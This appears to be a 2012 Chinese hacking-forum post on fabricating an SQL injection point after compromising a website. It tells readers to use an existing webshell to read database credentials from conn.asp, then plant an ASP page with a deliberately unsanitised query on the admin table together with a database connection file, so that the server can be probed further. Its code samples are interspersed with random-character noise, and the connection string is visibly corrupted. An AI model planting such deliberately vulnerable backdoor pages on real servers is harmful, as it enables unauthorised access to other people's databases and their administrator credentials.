找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2212|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵: f; \9 _, x) `2 s$ W/ d- A

  t& G7 W1 N% {# ?今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息" E4 \; x( f3 f' @
+ t8 N) {) }* ^
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
0 O  b8 p. C) {5 \! k( B$ o
/ x. g4 T$ C" z8 b首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
: q8 j+ E7 B8 @4 `0 H! u6 G2 l+ z' M: q. g
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表$ ?( I+ o8 z5 N- F! N$ K! h
9 j7 g8 u4 }% D/ r$ A/ R2 w: h: W
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:, v) m9 @5 m& g$ B  ~+ E& }
) h. `9 b  l! M( c& V* j
程序代码. x$ P6 C& @' ~' I, ^$ {! t
<!--#include file="xx.asp"-->6 P/ \) U0 N  P/ i) r& a/ [% h3 W
<%
- p0 B* `- W; v% ]( q* R1 eset rs=server.createobject("ADODB.recordset")" O0 B( l8 ?& F* C
id = request("id"). h7 u1 Z# X2 d4 z: n
strSQL = "select * from admin where id=" & id. ]8 h' k2 D& J! S0 G) K1 Z
rs.open strSQL,conn,1,3/ G0 \* e3 v) V. `
rs.close
+ {' I% R& D% h/ f/ C6 g%>
6 b' |  w9 a4 U" {8 j2 t4 h% F
' R! T# K- m1 V5 r把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
9 O0 c2 Q# O& H8 s8 o8 M8 n4 o( A  ^& a; _1 q3 P; D
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
& J9 L4 p' K6 H* J3 O3 ]* O* q% h1 x- P: \" g! C$ b
然后就要构造一个连接数据库的文件了,代码如下:
. C1 ^( B: J3 r# T0 p. z程序代码
$ {, ~  B; P& H5 h. W% N<%        
$ U: n/ I# t9 V5 f: OstrSQLServerName = "000.000.000.000"     '服务器名称或地址! u0 z8 g* G; a# W# e( Y* L2 V. k0 _
strSQLDBUserName = "sqlname"         '数据库帐号1 h5 L5 y# J0 C/ C* L3 y- o
strSQLDBPassword = "sqlpass"         '数据库密码
" k7 V* g: E4 qstrSQLDBName = "sqldataname"           '数据库名称+ O% L% v( p$ p4 p9 U
Set conn = Server.CreateObject("ADODB.Connection")
7 g0 Z0 R5 g4 |7 f* qstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"5 @/ I" [9 O  v2 P3 K2 H
conn.open strCon2 w/ }  B  b" }3 p2 X
%>
6 ]3 [) d8 {; X8 u
% w/ ^. n& N- C这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,+ F* i5 x/ C, @. V+ t* q; W! J

& v# x" q3 S( n# i- k就这样,正常情况下,就OK了,伪造成功……, v, o/ N" H9 k) G2 _# j4 q

$ _! e* P) M) l0 z5 h5 d2 q6 ^4 W           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表